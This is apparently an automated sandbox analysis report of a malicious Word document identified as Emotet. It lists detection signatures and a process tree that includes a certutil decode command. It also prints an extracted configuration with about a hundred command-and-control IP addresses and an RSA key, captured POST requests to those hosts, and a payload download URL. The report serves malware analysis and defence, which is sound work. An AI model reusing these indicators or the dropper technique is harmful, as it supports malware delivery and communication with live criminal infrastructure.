Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report sample1.bin

Overview

General Information

Sample Name:sample1.bin (renamed file extension from bin to doc)
Analysis ID:339440
MD5:7dbd8ecfada1d39a81a58c9468b91039
SHA1:0d21e2742204d1f98f6fcabe0544570fd6857dd3
SHA256:dc40e48d2eb0e57cd16b1792bdccc185440f632783c7bcc87c955e1d4e88fc95

Most interesting Screenshot:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Emotet
Creates and opens a fake document (probably a fake document to hide exploiting)
Creates processes via WMI
Document contains an embedded VBA macro with suspicious strings
Drops PE files to the user root directory
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Machine Learning detection for sample
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to call native functions
Contains functionality to delete services
Contains functionality to enumerate running services
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 1144 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • certutil.exe (PID: 2324 cmdline: Certutil -decode C:\Users\Public\Ksh1.xls C:\Users\Public\Ksh1.pdf MD5: 4586B77B18FA9A8518AF76CA8FD247D9)
  • svchost.exe (PID: 2836 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: C78655BC80301D76ED4FEF1C1EA40A7D)
  • tmp_e473b4.exe (PID: 1840 cmdline: C:\Users\user\AppData\Local\Temp/tmp_e473b4.exe MD5: E87553AEBAC0BF74D165A87321C629BE)
    • WPDShextAutoplay.exe (PID: 1888 cmdline: C:\Windows\SysWOW64\NlsData0018\WPDShextAutoplay.exe MD5: E87553AEBAC0BF74D165A87321C629BE)
      • shellstyle.exe (PID: 2208 cmdline: C:\Windows\SysWOW64\DevicePairingHandler\shellstyle.exe MD5: E87553AEBAC0BF74D165A87321C629BE)
        • NlsLexicons0416.exe (PID: 2908 cmdline: C:\Windows\SysWOW64\shsvcs\NlsLexicons0416.exe MD5: E87553AEBAC0BF74D165A87321C629BE)
          • mobsync.exe (PID: 2504 cmdline: C:\Windows\SysWOW64\mfc110fra\mobsync.exe MD5: E87553AEBAC0BF74D165A87321C629BE)
            • jsproxy.exe (PID: 2552 cmdline: C:\Windows\SysWOW64\capisp\jsproxy.exe MD5: E87553AEBAC0BF74D165A87321C629BE)
              • dllhost.exe (PID: 2484 cmdline: C:\Windows\SysWOW64\riched20\dllhost.exe MD5: E87553AEBAC0BF74D165A87321C629BE)
                • apds.exe (PID: 2336 cmdline: C:\Windows\SysWOW64\KBDMLT47\apds.exe MD5: E87553AEBAC0BF74D165A87321C629BE)
                  • upnp.exe (PID: 1788 cmdline: C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0\upnp.exe MD5: E87553AEBAC0BF74D165A87321C629BE)
                    • rasadhlp.exe (PID: 2080 cmdline: C:\Windows\SysWOW64\osk\rasadhlp.exe MD5: E87553AEBAC0BF74D165A87321C629BE)
  • cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["177.130.51.198:80", "91.121.87.90:8080", "104.131.144.215:8080", "188.226.165.170:8080", "2.58.16.86:8080", "79.133.6.236:8080", "125.200.20.233:80", "109.206.139.119:80", "188.40.170.197:80", "121.117.147.153:443", "221.147.142.214:80", "88.247.58.26:80", "37.205.9.252:7080", "213.165.178.214:80", "27.83.209.210:443", "24.231.51.190:80", "192.210.217.94:8080", "123.216.134.52:80", "179.5.118.12:80", "103.80.51.61:8080", "172.96.190.154:8080", "223.17.215.76:80", "46.105.131.68:8080", "116.91.240.96:80", "118.243.83.70:80", "190.117.101.56:80", "103.229.73.17:8080", "5.79.70.250:8080", "172.105.78.244:8080", "95.76.142.243:80", "113.193.239.51:443", "113.161.148.81:80", "180.148.4.130:8080", "172.193.79.237:80", "42.200.96.63:80", "110.37.224.243:80", "212.198.71.39:80", "185.80.172.199:80", "153.229.219.1:443", "162.144.145.58:8080", "190.55.186.229:80", "94.212.52.40:80", "37.46.129.215:8080", "82.78.179.117:443", "58.27.215.3:8080", "178.33.167.120:8080", "190.164.135.81:80", "73.100.19.104:80", "157.7.164.178:8081", "115.79.59.157:80", "190.194.12.132:80", "85.75.49.113:80", "185.142.236.163:443", "113.203.238.130:80", "91.75.75.46:80", "41.185.29.128:8080", "185.208.226.142:8080", "188.166.220.180:7080", "109.13.179.195:80", "91.83.93.103:443", "190.151.5.131:443", "203.153.216.178:7080", "51.38.50.144:8080", "36.91.44.183:80", "78.186.65.230:80", "180.23.53.200:80", "73.55.128.120:80", "75.127.14.170:8080", "119.92.77.17:80", "192.241.220.183:8080", "120.51.34.254:80", "202.29.237.113:8080", "41.76.213.144:8080", "195.201.56.70:8080", "175.103.38.146:80", "190.192.39.136:80", "203.56.191.129:8080", "180.21.3.52:80", "50.116.78.109:8080", "47.154.85.229:80", "54.38.143.245:8080", "43.255.175.197:80", "60.125.114.64:443", "8.4.9.137:8080", "91.213.106.100:8080", "116.202.10.123:8080", "103.93.220.182:80", "115.79.195.246:80", "139.59.61.215:443", "45.239.204.100:80", "143.95.101.72:8080", "198.20.228.9:8080", "192.163.221.191:8080", "139.59.12.63:8080", "77.74.78.80:443", "118.33.121.37:80", "126.126.139.26:443", "46.32.229.152:8080", "74.208.173.91:8080", "190.85.46.52:7080", "177.130.51.198:80", "91.121.87.90:8080", "104.131.144.215:8080", "188.226.165.170:8080", "2.58.16.86:8080", "79.133.6.236:8080", "125.200.20.233:80", "109.206.139.119:80", "188.40.170.197:80", "121.117.147.153:443", "221.147.142.214:80", "88.247.58.26:80", "37.205.9.252:7080", "213.165.178.214:80", "27.83.209.210:443", "24.231.51.190:80", "192.210.217.94:8080", "123.216.134.52:80", "179.5.118.12:80", "103.80.51.61:8080", "172.96.190.154:8080", "223.17.215.76:80", "46.105.131.68:8080", "116.91.240.96:80", "118.243.83.70:80", "190.117.101.56:80", "103.229.73.17:8080", "5.79.70.250:8080", "172.105.78.244:8080", "95.76.142.243:80", "113.193.239.51:443", "113.161.148.81:80", "180.148.4.130:8080", "172.193.79.237:80", "42.200.96.63:80", "110.37.224.243:80", "212.198.71.39:80", "185.80.172.199:80", "153.229.219.1:443", "162.144.145.58:8080", "190.55.186.229:80", "94.212.52.40:80", "37.46.129.215:8080", "82.78.179.117:443", "58.27.215.3:8080", "178.33.167.120:8080", "190.164.135.81:80", "73.100.19.104:80", "157.7.164.178:8081", "115.79.59.157:80", "190.194.12.132:80", "85.75.49.113:80", "185.142.236.163:443", "113.203.238.130:80", "91.75.75.46:80", "41.185.29.128:8080", "185.208.226.142:8080", "188.166.220.180:7080", "109.13.179.195:80", "91.83.93.103:443", "190.151.5.131:443", "203.153.216.178:7080", "51.38.50.144:8080", "36.91.44.183:80", "78.186.65.230:80", "180.23.53.200:80", "73.55.128.120:80", "75.127.14.170:8080", "119.92.77.17:80", "192.241.220.183:8080", "120.51.34.254:80", "202.29.237.113:8080", "41.76.213.144:8080", "195.201.56.70:8080", "175.103.38.146:80", "190.192.39.136:80", "203.56.191.129:8080", "180.21.3.52:80", "50.116.78.109:8080", "47.154.85.229:80", "54.38.143.245:8080", "43.255.175.197:80", "60.125.114.64:443", "8.4.9.137:8080", "91.213.106.100:8080", "116.202.10.123:8080", "103.93.220.182:80", "115.79.195.246:80", "139.59.61.215:443", "45.239.204.100:80", "143.95.101.72:8080", "198.20.228.9:8080", "192.163.221.191:8080", "139.59.12.63:8080", "77.74.78.80:443", "118.33.121.37:80", "126.126.139.26:443", "46.32.229.152:8080", "74.208.173.91:8080", "190.85.46.52:7080"], "RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAM/TXLLvX91I6dVMYe+T1PPO6mpcg7OJ\ncMl9o/g4nUhZOp8fAAmQl8XMXeGvDhZXTyX1AXf401iPFui0RB6glhl/7/djvi7j\nl32lAhyBANpKGty8xf3J5kGwwClnG/CXHQIDAQAB"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.2284406713.00000000007A1000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000011.00000002.2429576153.0000000000534000.00000004.00000020.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000009.00000003.2283230034.0000000000358000.00000004.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        0000000A.00000002.2292525309.00000000005E6000.00000004.00000020.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          00000010.00000002.2321415982.0000000000536000.00000004.00000020.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
            Click to see the 26 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            11.2.NlsLexicons0416.exe.3e0000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              8.2.tmp_e473b4.exe.7a0000.2.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                13.2.jsproxy.exe.2a0000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                  15.2.apds.exe.3e0000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                    9.2.WPDShextAutoplay.exe.2a0000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                      Click to see the 5 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Antivirus / Scanner detection for submitted sampleShow sources
                      Source: sample1.docAvira: detected
                      Antivirus detection for dropped fileShow sources
                      Source: C:\Users\Public\Ksh1.pdfAvira: detection malicious, Label: TR/Casdet.xqfgu
                      Found malware configurationShow sources
                      Source: 00000011.00000002.2429576153.0000000000534000.00000004.00000020.sdmpMalware Configuration Extractor: Emotet {"C2 list": ["177.130.51.198:80", "91.121.87.90:8080", "104.131.144.215:8080", "188.226.165.170:8080", "2.58.16.86:8080", "79.133.6.236:8080", "125.200.20.233:80", "109.206.139.119:80", "188.40.170.197:80", "121.117.147.153:443", "221.147.142.214:80", "88.247.58.26:80", "37.205.9.252:7080", "213.165.178.214:80", "27.83.209.210:443", "24.231.51.190:80", "192.210.217.94:8080", "123.216.134.52:80", "179.5.118.12:80", "103.80.51.61:8080", "172.96.190.154:8080", "223.17.215.76:80", "46.105.131.68:8080", "116.91.240.96:80", "118.243.83.70:80", "190.117.101.56:80", "103.229.73.17:8080", "5.79.70.250:8080", "172.105.78.244:8080", "95.76.142.243:80", "113.193.239.51:443", "113.161.148.81:80", "180.148.4.130:8080", "172.193.79.237:80", "42.200.96.63:80", "110.37.224.243:80", "212.198.71.39:80", "185.80.172.199:80", "153.229.219.1:443", "162.144.145.58:8080", "190.55.186.229:80", "94.212.52.40:80", "37.46.129.215:8080", "82.78.179.117:443", "58.27.215.3:8080", "178.33.167.120:8080", "190.164.135.81:80", "73.100.19.104:80", "157.7.164.178:8081", "115.79.59.157:80", "190.194.12.132:80", "85.75.49.113:80", "185.142.236.163:443", "113.203.238.130:80", "91.75.75.46:80", "41.185.29.128:8080", "185.208.226.142:8080", "188.166.220.180:7080", "109.13.179.195:80", "91.83.93.103:443", "190.151.5.131:443", "203.153.216.178:7080", "51.38.50.144:8080", "36.91.44.183:80", "78.186.65.230:80", "180.23.53.200:80", "73.55.128.120:80", "75.127.14.170:8080", "119.92.77.17:80", "192.241.220.183:8080", "120.51.34.254:80", "202.29.237.113:8080", "41.76.213.144:8080", "195.201.56.70:8080", "175.103.38.146:80", "190.192.39.136:80", "203.56.191.129:8080", "180.21.3.52:80", "50.116.78.109:8080", "47.154.85.229:80", "54.38.143.245:8080", "43.255.175.197:80", "60.125.114.64:443", "8.4.9.137:8080", "91.213.106.100:8080", "116.202.10.123:8080", "103.93.220.182:80", "115.79.195.246:80", "139.59.61.215:443", "45.239.204.100:80", "143.95.101.72:8080", "198.20.228.9:8080", "192.163.221.191:8080", "139.59.12.63:8080", "77.74.78.80:443", "118.33.121.37:80", "126.126.139.26:443", "46.32.229.152:8080", "74.208.173.91:8080", "190.85.46.52:7080", "177.130.51.198:80", "91.121.87.90:8080", "104.131.144.215:8080", "188.226.165.170:8080", "2.58.16.86:8080", "79.133.6.236:8080", "125.200.20.233:80", "109.206.139.119:80", "188.40.170.197:80", "121.117.147.153:443", "221.147.142.214:80", "88.247.58.26:80", "37.205.9.252:7080", "213.165.178.214:80", "27.83.209.210:443", "24.231.51.190:80", "192.210.217.94:8080", "123.216.134.52:80", "179.5.118.12:80", "103.80.51.61:8080", "172.96.190.154:8080", "223.17.215.76:80", "46.105.131.68:8080", "116.91.240.96:80", "118.243.83.70:80", "190.117.101.56:80", "103.229.73.17:8080", "5.79.70.250:8080", "172.105.78.244:8080", "95.76.142.243:80", "113.193.239.51:443", "113.161.148.81:80", "180.148.4.130:8080", "172.193.79.237:80", "42.200.96.63:80", "110.37.224.243:80", "212.198.71.39:80", "185.80.172.199:80", "153.229.219.1:443", "162.144.145.58:8080", "190.55.186.2
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\Public\Ksh1.pdfMetadefender: Detection: 40%Perma Link
                      Source: C:\Users\Public\Ksh1.pdfReversingLabs: Detection: 64%
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: sample1.docVirustotal: Detection: 61%Perma Link
                      Source: sample1.docMetadefender: Detection: 45%Perma Link
                      Source: sample1.docReversingLabs: Detection: 72%
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\Public\Ksh1.pdfJoe Sandbox ML: detected
                      Machine Learning detection for sampleShow sources
                      Source: sample1.docJoe Sandbox ML: detected
                      Source: 13.0.jsproxy.exe.400000.0.unpackAvira: Label: TR/AD.Emotet.fao
                      Source: 10.1.shellstyle.exe.39a0000.1.unpackAvira: Label: TR/Dropper.Gen
                      Source: 8.0.tmp_e473b4.exe.400000.0.unpackAvira: Label: TR/AD.Emotet.fao
                      Source: 10.0.shellstyle.exe.400000.0.unpackAvira: Label: TR/AD.Emotet.fao
                      Source: 11.0.NlsLexicons0416.exe.400000.0.unpackAvira: Label: TR/AD.Emotet.fao
                      Source: 12.0.mobsync.exe.400000.0.unpackAvira: Label: TR/AD.Emotet.fao
                      Source: 11.1.NlsLexicons0416.exe.39e0000.1.unpackAvira: Label: TR/Dropper.Gen
                      Source: 9.1.WPDShextAutoplay.exe.39c0000.2.unpackAvira: Label: TR/Dropper.Gen
                      Source: 15.0.apds.exe.400000.0.unpackAvira: Label: TR/AD.Emotet.fao
                      Source: 9.0.WPDShextAutoplay.exe.400000.0.unpackAvira: Label: TR/AD.Emotet.fao
                      Source: 10.1.shellstyle.exe.39a0000.2.unpackAvira: Label: TR/Dropper.Gen
                      Source: 13.1.jsproxy.exe.39e0000.1.unpackAvira: Label: TR/Dropper.Gen
                      Source: 14.0.dllhost.exe.400000.0.unpackAvira: Label: TR/AD.Emotet.fao
                      Source: 16.0.upnp.exe.400000.0.unpackAvira: Label: TR/AD.Emotet.fao
                      Source: 14.1.dllhost.exe.3980000.1.unpackAvira: Label: TR/Dropper.Gen
                      Source: 17.0.rasadhlp.exe.400000.0.unpackAvira: Label: TR/AD.Emotet.fao
                      Source: 9.1.WPDShextAutoplay.exe.39c0000.1.unpackAvira: Label: TR/Dropper.Gen
                      Source: 12.1.mobsync.exe.3980000.1.unpackAvira: Label: TR/Dropper.Gen
                      Source: 15.1.apds.exe.3980000.1.unpackAvira: Label: TR/Dropper.Gen
                      Source: C:\Windows\SysWOW64\osk\rasadhlp.exeCode function: 17_2_003225E0 CryptDecodeObjectEx,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptAcquireContextW,CryptGenKey,CryptCreateHash,GetProcessHeap,HeapFree,17_2_003225E0
                      Source: C:\Windows\SysWOW64\osk\rasadhlp.exeCode function: 17_2_00322230 CryptEncrypt,memcpy,CryptGetHashParam,CryptDestroyHash,CryptDuplicateHash,CryptExportKey,GetProcessHeap,RtlAllocateHeap,17_2_00322230
                      Source: C:\Windows\SysWOW64\osk\rasadhlp.exeCode function: 17_2_00321FD8 CryptDestroyHash,17_2_00321FD8
                      Source: C:\Windows\SysWOW64\osk\rasadhlp.exeCode function: 17_2_00321FC0 CryptDestroyHash,CryptDuplicateHash,memcpy,CryptVerifySignatureW,CryptDecrypt,17_2_00321FC0
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 8_2_007A38F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,8_2_007A38F0
                      Source: C:\Windows\SysWOW64\NlsData0018\WPDShextAutoplay.exeCode function: 9_2_002A38F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,9_2_002A38F0
                      Source: C:\Windows\SysWOW64\DevicePairingHandler\shellstyle.exeCode function: 10_2_003D38F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,10_2_003D38F0
                      Source: C:\Windows\SysWOW64\shsvcs\NlsLexicons0416.exeCode function: 11_2_003E38F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,11_2_003E38F0
                      Source: C:\Windows\SysWOW64\mfc110fra\mobsync.exeCode function: 12_2_002C38F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,12_2_002C38F0
                      Source: C:\Windows\SysWOW64\capisp\jsproxy.exeCode function: 13_2_002A38F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,13_2_002A38F0
                      Source: C:\Windows\SysWOW64\riched20\dllhost.exeCode function: 14_2_004838F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,14_2_004838F0
                      Source: C:\Windows\SysWOW64\KBDMLT47\apds.exeCode function: 15_2_003E38F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,15_2_003E38F0
                      Source: C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0\upnp.exeCode function: 16_2_003138F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,16_2_003138F0
                      Source: C:\Windows\SysWOW64\osk\rasadhlp.exeCode function: 17_2_003238F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,17_2_003238F0
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 4x nop then push ebp8_2_0041FA20
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 177.130.51.198:80

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2404310 ET CNC Feodo Tracker Reported CnC Server TCP group 6 192.168.2.22:49170 -> 177.130.51.198:80
                      Source: TrafficSnort IDS: 2404346 ET CNC Feodo Tracker Reported CnC Server TCP group 24 192.168.2.22:49171 -> 91.121.87.90:8080
                      Source: TrafficSnort IDS: 2404318 ET CNC Feodo Tracker Reported CnC Server TCP group 10 192.168.2.22:49174 -> 188.226.165.170:8080
                      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.121.87.90:8080
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.131.144.215:8080
                      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.226.165.170:8080
                      Source: Joe Sandbox ViewIP Address: 104.131.144.215 104.131.144.215
                      Source: Joe Sandbox ViewIP Address: 177.130.51.198 177.130.51.198
                      Source: Joe Sandbox ViewIP Address: 91.121.87.90 91.121.87.90
                      Source: Joe Sandbox ViewIP Address: 188.226.165.170 188.226.165.170
                      Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
                      Source: Joe Sandbox ViewASN Name: WspServicosdeTelecomunicacoesLtdaBR WspServicosdeTelecomunicacoesLtdaBR
                      Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
                      Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 177.130.51.198:80
                      Source: global trafficHTTP traffic detected: POST /bLyKQv7N53vEg8HnqG/AS5OEx79Hso/vmXj5PDqWcWGmmH57b/xq6PHaeNWW7/NgA8M5zv6E4oe8nfV/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 91.121.87.90/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=----------------------Ewgsdu27Sw4BxMsbn629IxUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.121.87.90:8080Content-Length: 4468Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /U7j2Ca9v8QUvcqf/fA93hWSHl2n7EAFUn8S/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 188.226.165.170/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=-------------------f9Qz0vwI2HdxXBENKKUUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 188.226.165.170:8080Content-Length: 4468Cache-Control: no-cache
                      Source: unknownTCP traffic detected without corresponding DNS query: 177.130.51.198
                      Source: unknownTCP traffic detected without corresponding DNS query: 177.130.51.198
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.121.87.90
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.121.87.90
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.121.87.90
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.121.87.90
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.121.87.90
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.121.87.90
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.121.87.90
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.131.144.215
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.131.144.215
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.131.144.215
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.131.144.215
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.131.144.215
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.131.144.215
                      Source: unknownTCP traffic detected without corresponding DNS query: 188.226.165.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 188.226.165.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 188.226.165.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 188.226.165.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 188.226.165.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 188.226.165.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 188.226.165.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 188.226.165.170
                      Source: C:\Windows\SysWOW64\osk\rasadhlp.exeCode function: 17_2_00322980 InternetReadFile,InternetReadFile,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,HttpQueryInfoW,17_2_00322980
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B65D8493-1CF8-4E74-AA78-05F4F57053A0}.tmpJump to behavior
                      Source: unknownHTTP traffic detected: POST /bLyKQv7N53vEg8HnqG/AS5OEx79Hso/vmXj5PDqWcWGmmH57b/xq6PHaeNWW7/NgA8M5zv6E4oe8nfV/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 91.121.87.90/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=----------------------Ewgsdu27Sw4BxMsbn629IxUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.121.87.90:8080Content-Length: 4468Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Thu, 14 Jan 2021 02:27:43 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
                      Source: certutil.exe, 00000002.00000002.2245348037.0000000002000000.00000002.00000001.sdmp, tmp_e473b4.exe, 00000008.00000002.2284898970.0000000002F00000.00000002.00000001.sdmp, WPDShextAutoplay.exe, 00000009.00000002.2290638749.0000000002F90000.00000002.00000001.sdmp, shellstyle.exe, 0000000A.00000002.2295226471.0000000002EE0000.00000002.00000001.sdmp, NlsLexicons0416.exe, 0000000B.00000002.2297985232.0000000002FA0000.00000002.00000001.sdmp, mobsync.exe, 0000000C.00000002.2302013971.0000000002E50000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                      Source: certutil.exe, 00000002.00000002.2245348037.0000000002000000.00000002.00000001.sdmp, tmp_e473b4.exe, 00000008.00000002.2284898970.0000000002F00000.00000002.00000001.sdmp, WPDShextAutoplay.exe, 00000009.00000002.2290638749.0000000002F90000.00000002.00000001.sdmp, shellstyle.exe, 0000000A.00000002.2295226471.0000000002EE0000.00000002.00000001.sdmp, NlsLexicons0416.exe, 0000000B.00000002.2297985232.0000000002FA0000.00000002.00000001.sdmp, mobsync.exe, 0000000C.00000002.2302013971.0000000002E50000.00000002.00000001.sdmp, jsproxy.exe, 0000000D.00000002.2308271752.0000000002F60000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                      Source: certutil.exe, 00000002.00000002.2246046542.0000000002570000.00000004.00000001.sdmpString found in binary or memory: https://pornthash.mobi/videos/tayna_tung
                      Source: certutil.exe, 00000002.00000002.2246046542.0000000002570000.00000004.00000001.sdmpString found in binary or memory: https://pornthash.mobi/videos/tayna_tung%temp%/tmp_e473b4.exex

                      E-Banking Fraud:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 00000008.00000002.2284406713.00000000007A1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2429576153.0000000000534000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.2283230034.0000000000358000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2292525309.00000000005E6000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2321415982.0000000000536000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2300986069.00000000002C1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2287635770.0000000000356000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2295906354.00000000003E1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2309825739.0000000000481000.00000020.00000001.sdmp, type: MEMORY
